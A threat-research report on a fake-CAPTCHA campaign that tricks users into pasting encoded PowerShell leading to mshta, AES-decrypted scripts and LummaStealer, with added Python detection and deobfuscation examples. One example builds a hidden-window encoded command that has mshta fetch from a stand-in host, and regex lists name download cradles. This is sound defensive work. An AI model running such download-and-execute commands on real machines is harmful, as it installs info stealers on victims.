Malware Family: Bunny Loader


Authors: Thomas Elkins, Andrew DiMotta, Eric Miller
Date of Publication: 09-20-2024

Executive Summary:

Over the past few months, Rapid7 has been tracking a threat group responsible for pushing out various info stealers, including LummaStealer and Cryptbot. Originally, this group relied on malicious .lnk files (Windows shortcut files) to compromise systems. However, in the past month, they shifted strategies to incorporate CAPTCHA-based social engineering techniques. Instead of relying solely on .lnk files, the new approach uses fake CAPTCHA challenges to deceive users into copying and pasting malicious PowerShell scripts into their command line interface. These scripts then execute and download info-stealing malware, compromising the victim’s sensitive information. This adaptation indicates a sophisticated approach, focusing on manipulating human behavior to bypass traditional defenses.

Overview:

  • Original Attack Vector (LNK Files): The campaign initially relied on distributing .lnk files disguised as legitimate shortcuts to movies. When executed, these files triggered the download of malicious payloads.
  • Recent Shift to CAPTCHA-Based Deception: In the last month, the threat actor moved away from using .lnk files as the primary delivery mechanism. They now employ fake CAPTCHA challenges as a key step in the infection process. Users are tricked into copying and pasting a provided PowerShell script, believing it to be a routine CAPTCHA bypass.
  • Resulting Malware: The PowerShell scripts executed by the victims lead to the installation of info-stealing malware. This malware is designed to capture sensitive information such as credentials, financial data, and personal identifiers.
  • Impact: This evolving tactic demonstrates the threat actor’s ability to adapt and refine their techniques, making it harder for both users and traditional security measures to detect the attack. It emphasizes the need for heightened awareness and advanced threat detection strategies.

Initial Access:

Starting in June 2024, Rapid7 observed users downloading malicious LNK files from websites that tricked them into thinking they were downloading movies. Upon execution, the LNK file contained commands that leveraged MSHTA to read content from a website hosting the next-stage payload.

Beginning in August of 2024, we observed a noticeable shift from the same threat group. Instead of using LNK files, they started to implement CAPTCHA challenges, tricking users into copying and pasting PowerShell commands in order to verify they were human. A common pattern identified with users being directed to URLs containing CAPTCHA challenges is that these URLs are hosted on Bunny CDN (b-cdn) servers, and the serving pages follow the naming convention captcha-verify.html. A search on VirusTotal revealed numerous domains, all hosting this same captcha-verify.html file.



Figure 1 - VirusTotal Results for URLs Containing captcha-verify.html


While analyzing the captcha-verify.html files, we observed that users were tricked into clicking the "I'm not a robot" button. After interaction with the button, a new window appears, instructing the user to open a Run window and paste in a command.



Figure 2 - Sample CAPTCHA Landing Page




Figure 3 - CAPTCHA Instructions to Run Command


After following the instructions, we observed that the command copied was designed to execute a Base64-encoded PowerShell command.



Figure 4 - CAPTCHA Instructions to Run Command


While looking at the source code of the HTML file, we identified the functions responsible for this behavior and observed that when the user interacts with the "I'm not a robot" button, what is actually placed on the clipboard is a command that runs a Base64-encoded PowerShell command.



Figure 5 - Source Code of captcha-verify.html Revealing Copy Function


Initial Payloads:

After decoding the Base64-encoded PowerShell command, we observed a call to a URL in order to retrieve an additional payload using mshta.exe:



Figure 6 - Decoding Base64 Encoded String


After navigating to the URL, we observed that it hosted a binary, nslookup.exe. While analyzing the binary nslookup.exe, we observed that it contained <script> tags within its code, indicating that the purpose of mshta.exe was to execute the code contained within the <script> tags.
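The first stage above is a Base64-encoded PowerShell command that hands a remote URL to mshta.exe. Defenders can reproduce the decoding step from process-creation telemetry and flag the same features the report describes. The following is an added example, not code from the report or from Rapid7: it decodes an -EncodedCommand argument (Base64 over UTF-16LE text) and checks both the raw command line and the decoded script against a small indicator list. The command lines, the cdn.example.invalid host and the indicator labels are constructed for illustration.

```python
import base64
import binascii
import re
from typing import List, Optional, Tuple

# powershell.exe accepts -e, -ec, -enc and -EncodedCommand (case-insensitive);
# the argument is Base64 over the UTF-16LE bytes of the script text.
ENCODED_ARG = re.compile(r'-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})', re.IGNORECASE)

# Behaviours the report attributes to the first stage, each with a label
INDICATORS = [
    ('mshta', re.compile(r'\bmshta(?:\.exe)?\b', re.IGNORECASE)),
    ('remote-url', re.compile(r'https?://', re.IGNORECASE)),
    ('invoke-expression', re.compile(r'\b(?:iex|invoke-expression)\b', re.IGNORECASE)),
    ('hidden-window', re.compile(r'-w(?:indowstyle)?\s+hidden', re.IGNORECASE)),
    ('download-cradle', re.compile(r'downloadstring|invoke-webrequest|\biwr\b|\birm\b', re.IGNORECASE)),
]


def encode_for_powershell(script: str) -> str:
    """Build an -EncodedCommand argument (used here only to construct sample input)."""
    return base64.b64encode(script.encode('utf-16-le')).decode('ascii')


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script text behind an -EncodedCommand argument, or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode('utf-16-le')
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def triage(cmdline: str) -> Tuple[Optional[str], List[str]]:
    """Return (decoded script or None, labels of indicators found in the raw
    command line and in the decoded script)."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + '\n' + decoded
    hits = [label for label, pat in INDICATORS if pat.search(haystack)]
    return decoded, hits


# Constructed sample command lines (not taken from the report's telemetry):
SAMPLE_CMDLINES = [
    # shape of the first stage: hidden window, encoded script handing a URL to mshta
    'powershell.exe -w hidden -enc '
    + encode_for_powershell('mshta https://cdn.example.invalid/nslookup.exe'),
    # encoded but harmless
    'powershell.exe -ec ' + encode_for_powershell('Get-Date'),
    # no encoded argument at all
    r'powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1',
]

if __name__ == '__main__':
    for line in SAMPLE_CMDLINES:
        decoded, hits = triage(line)
        print(hits or 'clean', '|', decoded)
```

The encoded-but-harmless sample shows why decoding has to happen before matching: an indicator list run over the raw command line alone would see only a Base64 blob, and a whitelist of "anything with -enc" would drown analysts in benign automation.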



Figure 7 - JavaScript Embedded within Binary nslookup.exe


Initial analysis revealed that the code within the <script> tags was written in JavaScript (JS). We noticed that the script contained a large set of variables being assigned specific character (char) codes. Additionally, we identified a variable named FeH, which contained a function designed to convert a large set of the variables (which were assigned the char codes) into strings.



Figure 8 - Contents of the JS Code


We extracted this code from the binary and saved it as a JavaScript file. We then placed a WScript.Echo(FeH) command at the end of the script in order to print out the contents of the variable FeH.



Figure 9 - Contents of the New JS Code


We observed that the variable FeH contained a new block of JavaScript code. After analyzing this new block, we determined that its purpose was to decode additional data and execute it. A function, avv, declared a variable fSg = "" that served as a buffer accumulating the output of a loop: for (var aKH = 0; aKH < wdj.length; aKH++) {var dyK = String.fromCharCode(wdj[aKH] - 697);fSg = fSg + dyK}return fSg}. In other words, 697 is subtracted from each array element, the result is interpreted as a character code, and the character is appended to the string.

We observed that the variable kqL contained a large array of numbers which were passed to the function avv, which converted each array value into a char code and then into a string. Following the same technique as before, we placed a WScript.Echo(kqL) at the end of the script in order to observe the results stored within the variable kqL.

The results for the variable kqL contained a second PowerShell Script.
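The char-code decoding described above (subtract a constant from each array element, then String.fromCharCode) is simple enough to reproduce offline without running any of the script, which avoids the risk of an echo helper being skipped and the payload executing. The following is an added example, not code from the report: decode() mirrors the avv loop for a known constant, and recover_offset() goes beyond the report's single case by brute-forcing the constant for samples where it is not readable, keeping the candidate whose output looks most like script text. The sample text, the keyword list and the 2000 offset ceiling are assumptions; the 697 is the constant from the loop quoted above.

```python
import string
from typing import List, Optional, Tuple

# Constructed sample text standing in for the decoded kqL array, which the
# report does not reproduce; the offset 697 is the constant from the avv loop.
SAMPLE_TEXT = 'function avv(wdj) { return String.fromCharCode(wdj) }'
SAMPLE_OFFSET = 697

# Tokens that suggest a candidate decode produced script text rather than noise
KEYWORDS = ('function', 'return', 'var', 'String', 'powershell', 'http', 'iex')
# Printable ASCII plus tab, newline and carriage return
PRINTABLE = set(range(32, 127)) | {9, 10, 13}


def encode(text: str, offset: int) -> List[int]:
    """Produce the numeric-array form (used here only to build test input)."""
    return [ord(c) + offset for c in text]


def decode(values: List[int], offset: int) -> Optional[str]:
    """Python mirror of the avv loop: chr(value - offset) for every element.
    Returns None as soon as any element lands outside printable ASCII."""
    codes = [v - offset for v in values]
    if any(c not in PRINTABLE for c in codes):
        return None
    return ''.join(chr(c) for c in codes)


def score(text: str) -> int:
    """Keyword hits weigh 10 each; letters, digits and spaces weigh 1 each."""
    hits = sum(text.count(k) for k in KEYWORDS)
    plain = sum(1 for c in text if c in string.ascii_letters + string.digits + ' ')
    return hits * 10 + plain


def recover_offset(values: List[int], max_offset: int = 2000) -> Tuple[Optional[int], Optional[str]]:
    """Brute-force the subtraction constant for a sample where it is not
    readable (for instance when the arithmetic itself is obfuscated). Returns
    the best (offset, text) pair, or (None, None) if nothing decodes to
    printable text."""
    best_offset, best_text, best_score = None, None, -1
    for offset in range(max_offset + 1):
        text = decode(values, offset)
        if text is None:
            continue
        s = score(text)
        if s > best_score:
            best_offset, best_text, best_score = offset, text, s
    return best_offset, best_text


if __name__ == '__main__':
    codes = encode(SAMPLE_TEXT, SAMPLE_OFFSET)
    print(decode(codes, SAMPLE_OFFSET))
    print(recover_offset(codes))
```

Because a space (code 32) is the lowest printable character in typical script text, any offset larger than the true one pushes spaces below 32 and is rejected outright; offsets smaller than the true one survive only while the largest character stays below 127, so the printable filter alone usually leaves a handful of candidates for the keyword score to separate.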



Figure 10 - Decoded Code Revealing PowerShell Script


Second Stage Payload:

Upon execution of the code contained within the binary downloaded via MSHTA, we observed the execution of a second PowerShell script (Figure 10). This script is heavily obfuscated and starts by transforming a Base64-encoded block of text into an array of bytes.



Figure 11 - The Function to Convert the Input String to an Array of Bytes


Once the byte array has been created, the script decrypts the byte array using an AES decryptor function.



Figure 12 - The Set of Commands to Decrypt the String Contained in the Variable $bUrqA


The decrypted result is a string whose first three characters are iex (an alias of the Invoke-Expression cmdlet in PowerShell). These three characters are split off and used to execute the rest of the string, which is a script containing five functions.



Figure 13 - Final PowerShell Script


The final function in this script, NHA, is the one that is executed using Invoke-Expression. This function leverages the other functions contained in the script to download a zip file from an obfuscated remote URL, extract its contents to the Temp directory, and execute the first item of the zip file contents.
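The second stage is a fixed chain of operations: Base64 to bytes, AES decryption, an iex prefix split off and applied to the remainder, then a zip archive extracted into the Temp directory and its first entry started. Each link is unremarkable on its own, so a script-block-logging detection should score the chain rather than any single call. The following is an added example, not code from the report or from Rapid7's detection library: it scores PowerShell script-block text against the six links above and includes an analyst-side split_iex_prefix() that returns the payload after the iex prefix for static review instead of executing it. The two script blocks are constructed sketches (no key, IV or ciphertext, so the suspicious one does nothing if run); the variable name $bUrqA is the one from Figure 12, and the threshold of four links is an assumption.

```python
import re
from typing import List, Optional

# Each feature is one link in the chain the report describes for the second stage
FEATURES = [
    ('base64-to-bytes', re.compile(r'FromBase64String', re.IGNORECASE)),
    ('aes-decrypt', re.compile(r'CreateDecryptor|AesCryptoServiceProvider|AesManaged|Cryptography\.Aes\]', re.IGNORECASE)),
    ('iex-prefix', re.compile(r'\.Substring\(\s*0\s*,\s*3\s*\)|\biex\b|Invoke-Expression', re.IGNORECASE)),
    ('archive-extract', re.compile(r'Expand-Archive|ExtractToDirectory|ZipFile\]', re.IGNORECASE)),
    ('temp-dir', re.compile(r'\$env:TE?MP\b|GetTempPath', re.IGNORECASE)),
    ('spawn', re.compile(r'Start-Process|\.Start\(\)', re.IGNORECASE)),
]
ALERT_THRESHOLD = 4  # assumption: four of the six links is enough to escalate


def matched_features(script_block: str) -> List[str]:
    """Labels of every chain link present in the script-block text, in chain order."""
    return [label for label, pat in FEATURES if pat.search(script_block)]


def is_suspicious(script_block: str) -> bool:
    return len(matched_features(script_block)) >= ALERT_THRESHOLD


def split_iex_prefix(decrypted: str) -> Optional[str]:
    """Analyst-side counterpart of the malware's own step: if the decrypted
    string starts with 'iex', return the remainder for static review rather
    than executing it; None if the prefix is absent."""
    if decrypted[:3].lower() == 'iex':
        return decrypted[3:].strip()
    return None


# Constructed script-block text in the shape of the second stage; the
# placeholders mean it performs no decryption and runs nothing.
SUSPICIOUS_BLOCK = r'''
$bUrqA = "PLACEHOLDER-BASE64-CIPHERTEXT"
$bytes = [System.Convert]::FromBase64String($bUrqA)
$aes = [System.Security.Cryptography.Aes]::Create()
$dec = $aes.CreateDecryptor($key, $iv)
$plain = [System.Text.Encoding]::UTF8.GetString($dec.TransformFinalBlock($bytes, 0, $bytes.Length))
& $plain.Substring(0, 3) $plain.Substring(3)
$zip = Join-Path $env:TEMP 'PLACEHOLDER.zip'
Expand-Archive -Path $zip -DestinationPath $env:TEMP -Force
Start-Process (Join-Path $env:TEMP 'PLACEHOLDER.exe')
'''

# Constructed benign admin script: also unpacks an archive via the Temp folder
BENIGN_BLOCK = r'''
$pkg = Join-Path $env:TEMP 'tools.zip'
Invoke-WebRequest -Uri https://updates.example.invalid/tools.zip -OutFile $pkg
Expand-Archive -Path $pkg -DestinationPath 'C:\Tools' -Force
'''

if __name__ == '__main__':
    for name, block in (('suspicious', SUSPICIOUS_BLOCK), ('benign', BENIGN_BLOCK)):
        print(name, matched_features(block), is_suspicious(block))
```

The benign block trips two links (archive extraction and the Temp folder), which is exactly why a single-call rule on Expand-Archive or $env:TEMP would be noisy; requiring the decode-decrypt-iex portion of the chain is what separates the loader from routine packaging scripts.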

Info Stealers:

The zip archive downloaded by the obfuscated PowerShell script is the final payload. The archive contents appear to vary with each infection, but the file to be executed is always placed first in the archive, which is the entry the script's final function launches.



Figure 14 - Malicious Executable 0a4scandoc.exe Contained within tera1.zip


The executable masquerades as a legitimate binary, but upon closer inspection, is trojanized and contains the LummaStealer family of malware. In other cases, we have observed that the binaries contained within the zip archives have been known to be packed with other types of information stealers such as Cryptbot and StealC.

Mitigations:

➔ Ensure that all devices are configured with Rapid7’s Insight Agent.
➔ Provide user awareness training that’s aimed at informing users on how to identify such threats.
➔ Ensure that the PowerShell execution policy is set to Restricted or AllSigned, so that only signed scripts can be executed.
➔ If MSHTA is not used for any legitimate business functions, disabling it can prevent it from being abused to download and execute malicious files.

  • You can block mshta.exe using software restriction policies or AppLocker.

Rapid7 Customers:

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7’s expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections deployed and alerting on the activity described in this blog:

  • Malicious Document - MSHTA Spawned by Scripting Engine
  • Malicious Document - MSHTA Retrieves From Remote Server
  • Attacker Technique - Renamed PythonW.exe Executed From Non-Standard Folder
  • Attacker Technique - PowerShell Download Cradles